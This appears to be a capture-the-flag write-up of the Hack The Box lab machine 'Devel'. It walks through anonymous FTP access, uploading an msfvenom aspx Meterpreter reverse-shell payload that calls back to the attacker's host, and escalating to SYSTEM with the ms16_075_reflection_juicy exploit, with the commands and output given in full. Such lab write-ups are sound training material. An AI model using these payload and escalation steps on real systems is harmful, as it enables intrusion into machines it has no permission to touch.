Sick day but I try popping a box nonetheless :(
Nmap first:
sudo nmap -sC -sV 10.129.1.123 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM [DIR] aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 | http-methods: |_ Potentially risky methods: TRACE
The host machine is hosting FTP (which picks up files inside of FTP's root directory for some reason?) and an IIS server.
This is what the webserver looks like - nothing fancy, the image simply redirects to Microsoft's iis.net.
Since FTP allows anonymous login, I let myself in, and look for any files and folder of value to me:
ftp> dir 229 Entering Extended Passive Mode (|||49159|) 125 Data connection already open; Transfer starting. 03-18-17 02:06AM [DIR] aspnet_client 03-17-17 05:37PM 689 iisstart.htm 03-17-17 05:37PM 184946 welcome.png
I get the two files found inside FTP's root folder, which I assume to be the IIS server's root directory going off of the fact that what's inside of here matches the image above (additionally, accessing http://10.129.1.123/iisstart.htm or http://10.129.1.123/welcome.png shows what the webpage itself would). Going inside aspnet_client (which is good info nonetheless, since we now know it's running on ASP.NET) doesn't yield us anything of use.
Surprisingly enough, we can upload our own files to the webserver's root directory, which brings me much closer to having a reverse shell. To get that, I'll use msfvenom to generate a payload in .aspx:
msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.106 LPORT=4567 > shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of aspx file: 2886 bytes
Following this, I can just upload the file on FTP and set up a listener with msfconsole:
msf](Jobs:0 Agents:0) >> use multi/handler [msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/meterpreter/reverse_tcp [msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST tun0 [msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LPORT 4567 [msf](Jobs:0 Agents:0) exploit(multi/handler) >> run [*] Started reverse TCP handler on 10.10.14.106:4567 [*] Sending stage (177734 bytes) to 10.129.1.123 [*] Meterpreter session 1 opened (10.10.14.106:4567 -> 10.129.1.123:49181) at 2026-05-21 13:58:26 -0500 (Meterpreter 1)(c:\windows\system32\inetsrv) >
This nets us a meterpreter as web!
(Meterpreter 1)(c:\windows\system32\inetsrv) > sysinfo Computer : DEVEL OS : Windows 7 (6.1 Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 1 Meterpreter : x86/windows
No architecture mismatch this time around - what I do have instead is a *very* outdated Windows (dating back to 2009) - 100% prone to privesc exploits. Using local_exploit_suggester, I found a couple which give me system:
exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
This is the one I'll be using today. The only thing I needed to change was LHOST and SESSION this time around.
After running it, we get system access! Good luck to everyone attempting this box!/p>
(Meterpreter 4)(C:\Windows\system32) > getuid Server username: NT AUTHORITY\SYSTEM